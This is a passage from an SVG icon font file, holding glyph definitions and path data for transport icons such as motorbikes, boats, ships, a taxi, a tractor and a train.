34 34 1 14-4 19-18 18z m-823-204c-18 26-12 60 12 79 23 19 61 17 78-6 10-12 20-14 33-11-11 34-44 56-82 52-39-3-70-34-74-73-4-39 20-74 58-86 36-10 72 3 87 35-12-1-24-2-33-7-28-15-62-8-79 17z" />
<glyph glyph-name="motor-bike-alt" horiz-adv-x="1000" unicode="&#xee26;" d="M792 394c-25 0-49-7-69-18l-68 116c13-5 28-7 44-7 46 0 47 0 47 54s-1 55-47 55c-32 0-61-11-77-26-20 7-83 30-92 30-30 1-30-41-1-45 18-2 62-9 81-12 0 0-1-1-1-2-147 0-218-109-218-109s2 21-34 21c-106 0-156 41-158-23-101 0-129-61-110-81 4 0 8-1 12-1-24-26-38-60-38-98 0-81 65-146 145-146 72 0 132 52 144 120 17-6 38-11 62-11h109c34 0 80 12 93 72l33 169c0 5 1 15 1 26l63-108c-40-25-67-71-67-122 0-81 65-146 146-146 80 0 146 65 146 146 0 80-66 146-146 146z m-498-116c3-8 5-16 5-24h-78l43 53c16-11 25-21 30-29z m-86-121c-50 0-91 41-91 91 0 43 31 80 72 89 28-6 49-15 65-24l-50-61-1-1c0 0 0-1 0-1 0-1 0-1 0-1l0-1 0 0 0-2 0-1 1 0c0-1 0-1 0-1l1-1 1 0c0 0 0 0 0 0 1-1 2-1 2-1h91c-3-47-42-85-91-85z m584 0c-51 0-92 41-92 91 0 31 16 59 41 75l46-78c1-2 3-3 5-3 1 0 2 0 3 1 2 1 3 5 2 8l-46 78c12 6 26 10 41 10 50 0 91-41 91-91 0-50-41-91-91-91z" />
<glyph glyph-name="motor-bike" horiz-adv-x="1000" unicode="&#xee27;" d="M797 345c-11 0-21-1-31-4l-18 52c55 28 100 27 100 27l16-9 56-4c-33 39-166 32-166 32l28 5s-1 30-18 68c-18 37-37 59-37 59-2-2-3-4-4-6 1 26 1 51 3 77l0 1c0 3 0 6-4 7-10 5-20 10-32 10-3 0-6-2-7-5-4-14-5-28-3-41-1 2-2 4-4 6-2 4-5 5-8 3-3 1-7 0-8-4-3-7-8-11-8-18-1-12 13-20 22-25 1 0 3-1 4 0 5-17 6-35 5-53-26-17-16-33-16-33l-5-8s-25 35-106-17-145-19-198 0c-54 19-251 24-251 24 97-15 140-94 140-94l-76 47c-34-4-25-39-25-39l140-86c28 10 59-20 59-20l29-52-40-11c-21 51-71 88-130 88-78 0-141-63-141-141s63-141 141-141c77 0 140 63 140 141 0 5 0 10 0 15l56 10s2 2 16-12c6-6 14-7 22-6 13-4 43-13 77-13 27 0 56 5 83 22 40 25 64 70 71 135 18 19 36 35 54 47l16-47c-49-22-83-71-83-128 0-78 63-141 141-141 77 0 141 63 141 141 0 78-64 141-141 141z m-594-262c-53 0-97 44-97 98s44 98 97 98c40 0 74-24 89-57l-106-31 4-22 111 19c0-2 0-5 0-7 0-54-44-98-98-98z m380 138c-43-26-99-16-126-8 3 39 17 129 86 150 67 20 90-10 97-26-6-56-25-95-57-116z m125 314c-4-2-7-3-10-4 0 19-2 38-8 56 3-1 5 0 7 1 4 4 8 7 12 11 0-21 0-43-1-64z m89-428c-54 0-98 43-98 97 0 38 22 71 53 87l31-91c2-6 8-10 14-10 1 0 3 0 4 0 8 3 12 11 9 19l-30 91c5 1 11 2 17 2 54 0 97-44 97-98 0-54-44-97-97-97z m-322 115c128-23 148 90 148 90h-127l-21-90z" />
<glyph glyph-name="motor-biker" horiz-adv-x="1000" unicode="&#xee28;" d="M217 283c-71 6-134-41-150-110-2-7-3-13-4-19v-28c1-4 2-9 3-14 14-74 85-125 159-114 80 11 135 83 123 163-12 73-67 117-131 122z m-11-237c-51 0-93 41-94 94 0 51 41 93 94 94 51 1 93-41 94-92 0-54-41-95-94-96z m263 559c-18-2-36-5-55-7v-50c15 4 32 0 43 13 2 2 4 3 6 5 20 14 41 23 65 19 11-2 22-7 34-10 16 24 19 50 7 78-9 24-25 42-52 48-7 1-14 2-21 3h-9c-1 0-3-1-4-1-21-5-40-12-54-29-9-11-14-24-16-39 19 3 38 6 56 9v-39z m171-437c7 57 37 97 92 117 36 13 73 15 111 14 2 0 6 1 8 2 12 12 13 34 4 47-3 5-6 7-11 6-26 0-53 0-79 0h-54c-9 29-31 47-45 72-3-2-4-3-5-4-27-21-55-42-82-64-4-3-8-5-14-5-25 1-50 0-74 1-16 0-31 0-46 0-19 1-30-7-35-25-1-2-2-4-2-7-31 12-58 28-74 59 48 36 94 72 141 108 30-42 60-84 90-126 32 24 63 47 94 70-11 16-22 31-34 46-20 26-40 53-62 78-19 22-61 24-84 6-47-35-93-70-140-105-6-5-12-9-19-14-1 9-2 16-2 26-33-13-63-25-94-38-8-4-14-9-21-13-22-17-34-39-31-67 2-18 8-34 16-50 1-2 5-3 7-3 11-2 22-2 33-4 41-6 75-25 101-58 20-26 32-56 38-88 3-16 13-26 26-34 6-3 13-6 19-9 31-12 63-14 96-15 38-2 76-2 113-2 7 0 14 0 20 0 0 2 1 4 0 6-3 24-4 48-1 73z m155 115c-78 0-142-58-144-139-2-82 62-147 143-148 78 0 143 65 144 144 0 78-65 143-143 143z m-1-237c-52 0-94 42-94 94 0 52 42 94 94 94 52-1 94-42 94-94 0-52-42-94-94-94z" />
<glyph glyph-name="oil-truck" horiz-adv-x="1000" unicode="&#xee29;" d="M657 259h-566c-16 0-28-13-28-29v-2c0-14 8-25 20-28 10 25 35 43 64 43 29 0 54-18 63-44h328c10 26 35 44 64 44 29 0 54-18 63-43 12 3 21 14 21 28v2c0 16-13 29-29 29z m-53-26c-27 0-50-23-50-51s23-50 50-50c28 0 51 23 51 50s-23 51-51 51z m0-86c-19 0-35 16-35 35s16 35 35 35 35-15 35-35-15-35-35-35z m-460 86c-27 0-50-23-50-51s23-50 50-50c28 0 51 23 51 50s-23 51-51 51z m0-86c-19 0-35 16-35 35s16 35 35 35 35-15 35-35-15-35-35-35z m722 295c-6 8-14 10-19 10h-127c-5 0-9-5-9-10v-229c0-5 4-9 9-9h34c11 23 34 39 62 39s51-16 62-39h50c5 0 10 4 10 9v114l-72 115z m17-99h-135c-5 0-9 4-9 9v72c0 5 4 10 9 10h79c15 0 19-4 22-10l44-72c0-5-5-9-10-9z m47-117c0-5-4-9-9-9s-9 4-9 9v17c0 5 4 9 9 9s9-4 9-9v-17z m-117 7c-27 0-50-23-50-51s23-50 50-50c28 0 51 23 51 50 0 28-23 51-51 51z m1-86c-20 0-35 16-35 35s15 35 35 35 35-15 35-35-16-35-35-35z m-192 402h-495v-273h495v273z m-205-172c-4-22-25-35-43-35-16 0-36 11-41 32l-2 6v10c2 9 6 18 11 26 4 8 8 15 13 23 8 14 15 29 19 45h1l0-2c4-14 10-27 17-40 7-12 14-25 21-37 5-9 5-18 4-28z m-306-101v273c-26 0-47-21-47-47v-178c0-26 21-48 47-48z m574 48v178c0 26-21 47-48 47v-273c27 0 48 22 48 48z m-435 231h75c4 0 8 3 8 6 0 4-4 7-8 7h-75c-5 0-8-3-8-7 0-3 3-6 8-6z m174 0h75c4 0 8 3 8 6 0 4-4 7-8 7h-75c-5 0-8-3-8-7 0-3 3-6 8-6z" />
<glyph glyph-name="rickshaw" horiz-adv-x="1000" unicode="&#xee2a;" d="M791 272c-13-2-18 3-22 14-12 36-25 72-38 108-2 4-8 10-12 10-19 2-37 1-56 1-2 0-5-2-5-5v-27c0-3 3-6 5-5 11 0 22 2 30-2 7-3 11-14 17-25 1-2 0-4-3-4-69 0-133 0-196 0-4 0-7 3-10 5-3 2-4 5-4 6 1 2 4 3 7 3h32c3 0 5 2 5 5v26c0 2-2 5-5 5h-85c-3 0-5-3-5-5-1-15-3-28 10-40 5-5 8-20 4-27-24-49-50-97-76-145-2-4-7-9-11-10-14-1-28 0-41 0-3 0-6 2-7 5-21 86-90 113-148 106-66-8-115-63-114-128 0-67 48-120 117-128 56-7 125 23 145 105 0 3 3 5 6 5 2 1 4 1 6 1 73 0 145 0 217-1 14 0 24 4 34 13 46 44 92 86 139 130 3 2 6 2 7-1 5-8 3-13-5-19-45-32-62-76-53-129 12-73 87-119 161-102 73 17 116 91 96 162-14 47-63 100-142 93z m-509-152c-7-40-48-70-91-68-47 2-88 40-90 85-2 53 34 92 88 98 42 4 84-27 95-70 0-3-2-5-5-5h-84c-3 0-6-3-6-6v-24c0-2 3-5 6-5h83c3 0 5-2 4-5z m144 45c19 37 38 72 58 109 1 3 3 3 4 0 18-37 35-72 52-109 1-2 0-4-3-4h-108c-3 0-5 2-3 4z m150 17c-18 38-36 76-55 116-1 2 0 4 3 4h175c3 0 4-1 2-3-40-40-79-79-119-118-2-2-5-2-6 1z m146-80c-20 39-8 89 26 111 2 2 5 1 6-2 7-18 13-36 20-55 1-3 4-4 7-3 9 3 17 5 26 8 3 1 4 4 3 7-7 20-13 39-19 58-1 3 0 6 3 6 37 10 82-15 98-56 18-43-3-96-46-115-47-22-100-4-124 41z m-545 344c3-1 5 1 5 4-1 20-2 38-3 60 0 2 1 3 3 1 25-30 47-57 70-85 2-2 5-2 7 0 53 80 104 157 156 236 2 2 1 4-2 5-59 7-114 13-170 19-6 1-14-1-19-4-33-23-65-46-97-69-4-3-7-9-8-13 0-44 0-87 0-131 1-4 5-11 8-12 16-4 32-7 50-11z m97 148h56c3 0 4-2 3-4-20-33-40-65-61-101-2-2-3-2-3 1v99c0 3 2 5 5 5z m-34-2v-108c0-3-1-4-3-1-18 22-34 43-51 64-2 3-1 6 1 8 15 14 22 38 48 41 3 1 5-2 5-4z m29-227c-4 34-23 49-58 53-29 3-57 11-87 18-3 0-5-1-5-4 0-33 0-65 1-96 0-4 5-10 9-11 84-32 169-63 254-94 3-1 6 0 7 3 2 11-3 17-13 22-13 6-24 16-38 21-41 16-64 46-70 88z" />
<glyph glyph-name="rocket-alt-1" horiz-adv-x="1000" unicode="&#xee2b;" d="M527 765c22-22 45-45 65-69 30-35 51-76 68-121h-320c3 8 5 16 9 23 33 71 77 134 141 182 2 2 4 5 6 8h4c2 0 14-11 27-23z m-355-638l90 51c6 4 12 8 19 11 15-62 30-123 45-187-50-25-101-50-153-76-15-7-28 1-28 18v134c0 18 12 40 27 49z m654-201c-51 26-102 51-152 76 15 62 29 123 45 187 35-21 72-42 108-62 15-9 28-31 28-49v-134c0-17-13-25-29-18z m-324 622c49 0 99-1 149 0 16 1 22-6 26-20 26-90 31-182 20-274-10-80-29-158-55-234-5-12-10-17-23-17-79 1-158 1-238 0-11 0-18 3-22 15-38 112-65 226-60 345 3 56 16 111 25 167 2 16 11 18 25 18 51-1 102 0 153 0z m-95-226c1-41 10-80 39-112 32-34 75-34 107 0 52 55 53 166 3 223-34 38-78 38-112 0-28-32-36-70-37-111z m-38-345h261c-5-19-10-38-16-56-1-4-8-8-13-8-68-1-135-1-202 0-5 0-12 6-14 10-6 17-10 34-16 54z" />
<glyph glyph-name="rocket-alt-2" horiz-adv-x="1000" unicode="&#xee2c;" d="M418 110c-32-32-49-8-68 11-27 27-55 55-83 83-18 19-49 34-11 70l-10 2c-8-2-16-3-23-7-28-17-57-32-84-51-32-22-41 10-57 23-17 13-1 24 7 33 39 45 78 90 119 133 8 9 22 14 34 16 21 3 42 6 63 4 36-3 55 16 74 43 75 104 164 192 280 252 65 34 65 34 116-17 36-37 71-74 109-108 13-13 14-22 8-38-40-97-101-179-180-248-37-33-79-61-117-93-9-8-17-23-19-36-4-30-3-60-7-90-1-10-7-22-15-30-45-40-92-80-138-120-11-10-22-17-32-2-10 15-42 20-24 49 18 31 36 61 54 92 4 6 6 13 9 20-2 3-3 6-5 9z m253 478c-36 0-67-30-67-66 0-33 30-64 64-65 34-1 67 32 67 66 0 33-31 64-64 65z m-609-665c19 12 36 23 51 36 8 6 16 16 19 25 3 9 2 22-3 28-4 4-18 1-27 0-4-1-9-5-15-9-6 42 18 66 45 89 2 3 7 3 9 6 9 11 18 23 27 34-12 4-23 7-42 12 11 11 21 24 33 31 36 21 88 14 120-13 42-35 55-78 40-127-16-52-51-83-101-100 0 2-1 4-1 5l-2 43c-13-7-27-11-39-20-15-11-28-26-43-37-26-18-36-18-71-3z m848 683c-53 53-101 102-153 156 54 9 107 19 161 26 21 2 21-16 18-31-8-50-17-99-26-151z" />
<glyph glyph-name="rocket" horiz-adv-x="1000" unicode="&#xee2d;" d="M937 788s-131 3-262-62c-40-19-84-48-120-84-59-59-151-168-222-255h-161l-73-110 124-33c0-4 2-11 5-19l-19-42s-8-15 47-73c58-58 76-51 76-51l46 20c7-2 12-2 15-2l34-128 109 73v165c89 72 197 161 255 218 37 36 66 80 88 120 62 131 58 263 58 263z m-255-328c-40 0-73 32-73 73s33 72 73 72c40 0 73-32 73-72s-33-73-73-73z m-557-485s-7 106 47 175c-3 7-7 11-11 18l-25-22c-84-84-73-233-73-233s149-11 233 73l22 25c-7 4-11 8-18 11-69-54-175-47-175-47z" />
<glyph glyph-name="sail-boat-alt-1" horiz-adv-x="1000" unicode="&#xee2e;" d="M572 159c84 0 168 0 253 0-8 29-247 581-270 621v-322c0-91 0-183 0-274 0-12-4-25 17-25z m32-28c-11 0-23 1-27-13-5-23-18-43-19-68h215c-6 19-13 36-16 53-5 24-17 30-41 29-37-2-74-1-112-1z m-135-77c5 31 5 685 0 727-119-228-234-451-353-678 126 8 244 10 353-49z m94-33c-24 0-33 5-35 24v187c0 171 0 343 0 514 0 8-1 16 0 24 0 10-1 18-15 17-11 0-12-7-12-15l0-24c0-227 0-453-1-679l0-20s1-27-22-27h0c-63 2-126-2-188 4-57 6-112 21-172 35 26-52 53-97 91-134 10-10 21-15 36-15 188 1 376 1 563 1 12 0 22 0 28 13 14 31 30 61 48 96-112 0-217 1-321-1z" />
<glyph glyph-name="sail-boat-alt-2" horiz-adv-x="1000" unicode="&#xee2f;" d="M261 115c-1-1-2-3-2-4-2-3-2-7 1-9 3-3 6-4 9-2 4 2 8 4 12 5 94 41 191 70 291 90 10 1 14 6 13 16 0 31 0 62 0 92 0 142 0 284 0 425 0 9 2 11 10 8 33-11 66-14 100-4 21 7 42 6 62 2 4-1 8-3 10 2 1 4-2 6-6 8-18 9-36 16-56 18-16 2-32-1-48 0-26 2-51 10-75 23-11 6-18 2-19-11 0-4 0-8 0-11v-71c-4 3-6 5-8 6-25 19-49 38-73 57-10 7-16 4-17-7-11-91-30-179-54-267-36-128-83-251-150-366z m-9 53c40 75 73 153 99 233 55 155 75 265 63 276-6 6-81 63-81 63-17 13-34 26-51 39-9 6-14 4-16-7-1-6-1-12-2-18-14-95-33-189-58-281-33-124-75-244-137-357-2-4-5-8-1-13 5-5 9-2 14 0 50 22 101 40 154 53 8 1 13 5 16 12z m669 72c-2 0-4-1-5-1-93-18-186-38-277-67-66-21-132-46-199-67-99-31-199-52-304-44-6 1-6-3-6-7-1-25 8-46 28-62 5-4 11-7 19-7l61 1c48 18 141 40 283 19 65-9 120-5 165 5 7 59 33 109 78 151 13 12 26 21 43 26l1 0c0 1 1 1 1 1l97 26c6 2 12 4 18 5 7 2 11 6 10 13-1 7-7 8-13 8z m-303 330c-6-4-3-9-1-14 26-75 38-151 29-230-2-11-4-21-5-32 0-6 4-9 11-8 72 15 142 7 211-17 5-1 9-2 12 3 4 5 0 8-3 12l-241 281c-3 4-7 9-13 5z m-97-574c-221 31-323-39-323-39s53 29 328 9l328 120s-111-122-333-90z m36-53c-177 26-258-31-258-31s42 23 262 8l262 95c0 0-89-97-266-72z" />
<glyph glyph-name="sail-boat" horiz-adv-x="1000" unicode="&#xee30;" d="M826 158c-16 46-29 94-51 137-75 152-185 274-331 362-13 7-18 15-17 30 2 18 1 37 1 56-18-17-32-32-48-45-24-20-49-39-74-58l-27-21 2-4c45 9 89 19 137 29-2-32 3-64-7-90-66-171-151-331-267-475-5-7-10-14-18-24 237 27 469 54 703 81-1 8-1 15-3 22z m-396-48v528c38-176 59-352 0-528z m-367-91c7-17 14-31 19-45 5-13 13-16 25-16 202 0 404 1 606-1 48-1 87 14 124 41 11 9 22 16 32 25 28 25 54 53 69 93-294-32-583-65-875-97z" />
<glyph glyph-name="scooter" horiz-adv-x="1000" unicode="&#xee31;" d="M768 514h-263v-50h293l-30 50z m-610-233c-48 0-87-39-87-88 0-49 39-88 87-88s88 39 88 88c0 49-39 88-88 88z m0-126c-20 0-37 17-37 38 0 21 17 38 37 38 21 0 38-17 38-38s-17-38-38-38z m347 293s183-201 0-201h-33s-272 24-107 291l27 27h49v16s-74 31-80 0c-7-31-164-220-164-220-55 13-98-20-134-80 66 20 131 45 183-14 53-59 28-69 405-69 0 0-69 4-24 49h62c-12-15-20-33-20-54 0-49 40-88 88-88 49 0 88 39 88 88 0 21-7 39-19 54h46c100 0-67 201-67 201l-300 0z m252-293c-21 0-38 17-38 38 0 21 17 38 38 38 21 0 38-17 38-38s-17-38-38-38z m156 149h25v-47h-25v47z m-568 280l-36 11v-47h25l11 36z" />
<glyph glyph-name="sea-plane" horiz-adv-x="1000" unicode="&#xee32;" d="M936 258c-1 10-11 7-18 7l-184 0c-5 0-12-3-15 6-9 24-18 49-28 74 17 3 32 6 47 8 42 4 75 21 94 61 11 22 26 41 40 61l3-2v-106c0-8 0-15 9-15 10 0 10 8 10 15v10c0 31 0 62 0 93 0 8 0 13 10 14 9 0 16 6 16 17 0 10-5 16-15 17-10 1-11 7-11 15 1 33 1 66 0 98 0 7 0 15-10 15-10 0-9-8-9-15 0-33 0-67 0-100 0-8-1-13-11-11-63 7-128 9-183 47-18 13-38 14-59 10-78-16-157-28-230-63-51-24-102-31-157-29-20 1-32 7-40 25-14 30-29 60-42 90-6 14-15 19-29 19-16 0-32 1-47 3-13 1-17-2-13-15 14-53 27-107 41-160 11-42 29-57 72-63 83-12 167-25 250-38 9-1 10-4 7-12-8-18-15-37-21-55-3-11-8-15-20-15-63 1-126 1-189 0-18 0-23-6-19-22 2-10 10-11 18-13 38-11 76-20 114-31 8-2 15-1 22 2 38 16 77 16 115 0 30-12 58-12 87 0 39 17 78 16 116 0 29-12 58-12 87 0 34 15 69 15 104 4 6-2 11-5 17-3 21 8 43 16 63 28 12 7 10 18 8 29z m-304 300c12 0 22-1 33-7 15-8 30-16 46-24 11-6 12-12 7-23-10-19-22-34-46-26-21-7-30 3-34 22-3 16-9 30-15 45-4 10-1 12 9 13z m-205-71c-2 10 2 18 13 22 34 15 70 24 107 31 0 0 1 0 1 0 16 3 30 10 46 9 8-22 16-44 22-66 3-8-5-6-9-6-28 0-56 0-84 0-26 0-52 0-78 0-7 0-17-2-18 10z m48-223c-14 1-32-6-40 4-5 5 7 24 11 37 15 39 15 39 57 39 50 0 99 0 149 1 11 0 17-3 21-14 7-22 16-43 24-67-75 0-149 0-222 0z m414-134c-9 1-19 3-28 7-40 17-79 16-120-1-26-11-54-11-81 0-41 17-81 18-122 0-27-11-55-9-83 0-14 5-28 11-43 13-26 3-50-3-73-12-29-11-58-11-88 0-14 5-28 10-44 12-30 4-56-7-84-16-10-4-25 1-29-8-5-9-1-22-1-33h-1c0-10 1-19 0-29 0-8 3-10 10-9 17 3 32 7 47 13 30 11 59 12 88 0 39-16 78-16 117 0 28 12 56 12 84 0 40-16 80-16 120 1 27 11 54 11 81 0 41-17 82-17 123 0 26 11 52 9 78 1 16-5 32-11 49-14 12-2 14 2 14 13-1 15-1 31 0 47 1 11-4 14-14 15z" />
<glyph glyph-name="ship-alt" horiz-adv-x="1000" unicode="&#xee33;" d="M348 735c0 29 24 53 53 53 24 0 44-17 50-39l2 1c21 0 39-18 39-40 0-5-1-10-3-14 13 0 24-11 24-25s-11-24-24-24c-13 0-24 11-24 24l0 2c-4-1-8-2-12-2-13 0-25 7-32 17-6-3-13-5-20-5-29 0-53 24-53 52z m24-258h-71c-13 0-23-10-23-22v-152l222 106 222-106v152c0 12-10 22-23 22h-327z m256 23v14c0 12-10 22-23 22h-55l-10 91h-80l-10-91h-55c-13 0-23-10-23-22v-14h256z m-128-116l-330-158 98-285c45 21 103 41 163 41 96 0 173-46 275-69h17l107 313-330 158z" />
<glyph glyph-name="ship" horiz-adv-x="1000" unicode="&#xee34;" d="M817 121c-24-11-50-13-76-9l-5 0c-3 1-6 7-6 14-2 18-4 35-6 51-9 54-5 106 23 155 14 26 25 55 37 82 5 12 0 21-9 28-12 8-23 15-35 22-8 4-12 9-12 19 1 36 1 71-1 107-1 21-16 38-38 42-4 1-8 1-13 2-7 0-13 6-13 13 0 8 0 15 0 22 0 35-20 54-55 54-10 1-20 1-31 0-7 0-13 6-13 13v39c0 7-6 13-13 13h-104c-7 0-13-6-13-13v-39c0-7-6-12-13-12-12 0-23 0-34 0-31-1-50-20-50-51 0-8 0-17 0-26 0-7-3-12-6-13-2 0-4 0-6 0-34-1-54-20-54-54 0-32 0-63 1-94 0-12-4-18-14-23-9-3-17-9-25-15-21-14-24-21-14-45 12-27 24-54 38-80 16-33 25-67 22-104-3-30-6-61-9-92 0-7-6-14-13-15-23-2-45 2-68 11-14 5-26 14-39 21-8 4-15 6-24 7-7 1-12-6-12-13v-43c0-7 6-12 12-14 14-3 26-10 38-18 35-21 72-27 112-19 13 2 25 8 37 14 6 3 16 4 23 2 49-17 99-34 148-51 10-3 22-3 31 0 53 18 105 36 157 54 7 2 17 1 23-2 55-30 109-28 164 9 4 3 10 6 15 8 7 3 12 11 12 18v44c0 7-5 10-12 8-7-3-13-6-19-9-13-6-25-13-38-18z m-428 567c28 0 56 0 84 0h135c15 0 18-3 19-19 0-7 0-14 0-22 0-7-6-12-13-12h-228c-7 0-13 5-13 12 0 10 0 20 0 29 1 9 7 12 16 12z m43-90h236c21 0 24-3 24-23v-74c0-7-5-10-12-8-24 10-46 19-69 28-32 11-63 23-95 32-10 3-23 4-32 0-55-19-110-40-164-60-2-1-4-1-6-2-3-2-6 0-7 2 0 2 0 4 0 5 0 26 0 51 0 77 0 19 4 23 23 23 34 0 68 0 102 0z m309-614c-22 3-41 15-60 26-31 18-63 17-94 0-7-4-13-8-20-11-26-15-53-18-83-15-19 2-37 10-54 21-18 12-38 18-61 18-21-1-39-8-57-19-39-24-81-26-123-9-14 6-26 15-39 22-8 4-15 6-24 7-7 0-12-6-12-13v-43c0-7 6-13 12-14 14-3 26-11 38-18 35-22 72-27 112-20 21 5 40 15 57 27 16 10 33 13 51 11 16-1 29-10 43-18 55-32 110-32 164 4 31 20 61 20 92 0 59-37 117-37 176 2 4 4 10 6 15 9 7 3 12 11 12 18v43c0 7-5 11-12 8-7-2-13-5-19-8-13-6-25-13-38-18-24-11-50-13-76-10z" />
<glyph glyph-name="speed-boat" horiz-adv-x="1000" unicode="&#xee35;" d="M711 377l-64 138h-309v-41h66l45-107-386-30 102-151h630c81 0 143 191 143 191l-227 0z m-209-10l-46 107h173l49-97-176-10z" />
<glyph glyph-name="taxi" horiz-adv-x="1000" unicode="&#xee36;" d="M936 307c-1 41-24 72-63 86-12 5-18 11-22 22-20 54-42 109-63 163-20 53-50 73-107 73h-38c0 2 1 4 1 6 0 31 0 61 0 91 0 21-12 33-33 33-70 0-140 0-209 0-22 0-34-12-34-33v-90c0-3 1-4 1-7h-51c-56 0-86-20-106-72-22-56-44-112-66-168-2-6-7-13-13-15-49-20-70-51-70-104v-223c0-2 1-4 3-4 18 0 34 0 51 1 13 0 18-4 17-18 0-25 0-51 1-76 3-35 39-60 73-51 32 8 50 30 50 66 1 24 1 49 1 74 0 2 1 4 3 4h476c2 0 4-2 4-4 0-25-1-49 0-73 1-50 38-79 82-66 24 8 40 28 41 53 1 28 0 57 0 87 0 2 2 3 4 3h64c2 0 4 2 4 4 0 81 2 159-1 238z m-332 356h-39v39h39v-39z m-78 74c0 1 3 4 5 4 11 1 22 0 34 0v-39h-39c0 12 0 23 0 35z m-1-74h-38v39h38v-39z m-78 78h39v-39l-40 1 1 26c0 4 0 8 0 12z m-39-38h38v-40h-38c0 13 0 26 0 40z m-210-502c-37 0-67 31-66 68 1 36 31 67 66 67 36 0 65-31 64-69 0-37-28-66-64-66z m15 198c-2 0-3 2-3 4 0 2 1 4 1 6 18 49 36 97 55 146 11 29 21 35 51 35h156v-8c0-2 1-3 3-3h48c2 0 3 1 3 3v8c52 0 104 0 156 1 24 0 40-8 49-30 19-52 38-104 57-156 1-1 1-2 1-3 0-1-2-3-4-3h-36c-12 38-47 66-88 66s-77-28-88-66h-361v0z m449 56c36 0 67-23 78-56h-156c11 33 42 56 78 56z m141-254c-37 0-65 29-66 65 0 39 28 69 64 70 36 0 67-32 67-68 0-37-30-66-65-67z" />
<glyph glyph-name="tractor" horiz-adv-x="1000" unicode="&#xee37;" d="M915 421c-3 0-7 0-10 0h-174v10c0 35 0 70 0 105 0 16 0 32 2 48 2 21 7 42 33 48v33c-18 1-39-3-55-10-33-16-48-44-49-79-2-48-1-96-1-144v-11h-105c-4 13-7 25-10 37-20 80-39 159-59 238-4 18-11 33-30 40h-293c-22-7-29-23-29-45 1-77 1-154 1-231 0-7-3-10-8-14-19-13-38-24-55-40-18-16-6-48 18-54 17-4 28 4 40 13 61 45 129 60 202 42 82-21 137-73 167-152 10-25 13-51 14-78 2-24 20-39 42-35 17 3 28 18 28 37 0 10 0 21 0 31h98c-69-60-59-152-10-199 49-48 128-52 180-8 26 23 42 51 46 85 6 50-12 91-51 124 21 8 33 22 40 42 8 23 17 46 25 69 8 22 17 44 24 66 5 17-4 30-21 32z m-709 70v174c3 0 7 1 10 1 65 0 131 0 197 0 7 0 10-2 12-9 13-53 27-106 40-159 1-2 1-4 2-7-88 0-174 0-261 0z m560-463c-42 0-78 36-78 78 1 42 36 77 78 77 42 0 77-35 77-78 0-42-35-77-77-77z m-287 196c1 3 1 7 0 10-2 9-5 17-9 25-2 4-8 6-11 10-4 5-10 12-9 16 1 7 1 11-3 15-6 7-11 14-17 21-2 2-6 5-9 5-13 1-17 4-19 16-1 2-2 5-4 7-9 5-18 11-28 16-3 1-7-1-11 0-7 1-17 2-18 5-3 9-9 10-15 11-8 2-16 4-25 5-3 0-7-1-9-3-8-6-16-6-24 1-2 2-6 3-10 3-9-1-18-2-28-5-4-1-6-6-11-8-5-3-13-8-17-6-6 2-11 2-16-1-8-4-16-8-24-13-3-2-5-7-6-11-1-5-10-12-16-12-4 0-9-1-12-4-6-6-13-13-18-21-3-3-2-9-4-13-2-6-5-15-9-16-7-2-10-5-12-10-4-8-8-16-10-24-1-5 2-10 2-15-1-6 0-15-4-18-6-4-8-8-8-14-1-7-2-13-2-19v-3c1-5 2-11 5-14 8-8 9-15 3-23-2-3-2-7-2-9 3-10 6-20 10-30 1-3 3-6 5-7 12-6 14-10 12-22-1-2-1-3 0-4 8-11 15-22 24-32 1-2 6 0 8-1 5-4 14-9 14-12 0-9 4-12 9-16 7-5 14-10 21-13 4-2 9-2 13-1 5 1 18-3 18-7 1-7 5-9 11-11 8-2 16-5 25-5 4-1 9 3 14 3 6 1 16 3 18 0 6-7 12-7 18-6 8 0 16 1 23 2 4 1 8 3 10 5 7 10 13 12 23 7 3-1 7-1 10 0 9 4 18 8 27 14 3 1 4 7 6 10 5 5 11 13 15 12 8-2 12 1 17 6 6 6 12 11 17 18 2 2 4 6 4 9 0 12 2 16 14 20 3 1 6 4 7 6 4 9 9 18 12 27 1 4 0 9-1 13-3 5 0 16 5 20 3 2 7 7 7 10 2 16 2 31 3 46 0 4-2 8-4 10-10 10-11 13-5 25z m-204-182c-73 0-133 60-133 133 0 74 60 134 133 134 74 0 135-61 134-134 0-73-60-133-134-133z m1 197c-35 0-64-29-64-63 0-35 29-64 64-64 34 0 63 29 63 63 0 35-29 64-63 64z" />
<glyph glyph-name="train-line" horiz-adv-x="1000" unicode="&#xee38;" d="M200-87c29 49 57 98 86 148-16 0-29 1-43 0-27 0-43 17-43 44l-1 538c0 18 0 36 1 54 0 24 16 40 40 40 39 0 78 0 118 0h17c0 7 0 13 0 19 0 21 10 31 31 32 18 0 36 0 53 0 43 0 86 0 129 0 28 0 37-10 37-37v-13h21c37 0 75-1 112 0 26 0 42-17 42-43v-464c0-42 0-85 0-127 0-27-16-42-43-43-13 0-27 0-43 0 29-50 57-99 86-149h-600v1z m76 674v-249h198v249h-198z m449-1h-199v-248h199v248z m-29-649c-2 4-3 6-4 8-5 13-13 17-28 17-110-1-221-1-332-1-16 0-24-7-26-24l390 0z m-28 50c-4 6-7 11-10 16-3 7-8 9-15 9-22 0-45 0-67 0-74 0-148 0-221 0-3 0-8-1-10-3-5-6-8-14-13-22l336 0z m-168 650c29 1 50 23 50 53-1 25-24 47-50 47-27 0-50-23-50-50 0-27 23-50 50-50z m174-450c29 0 51 22 51 50 1 27-23 50-50 50-27 0-49-22-50-49 0-28 22-51 49-51z m-350 0c29 1 51 22 51 51-1 27-23 49-50 49-28 0-50-23-50-51 0-27 22-49 49-49z m39-149h274c-3 6-6 10-8 15-2 7-7 9-15 9-9-1-18-1-27-1-68 0-137 0-205 0-3 0-7-1-9-4-4-5-6-12-10-19z" />
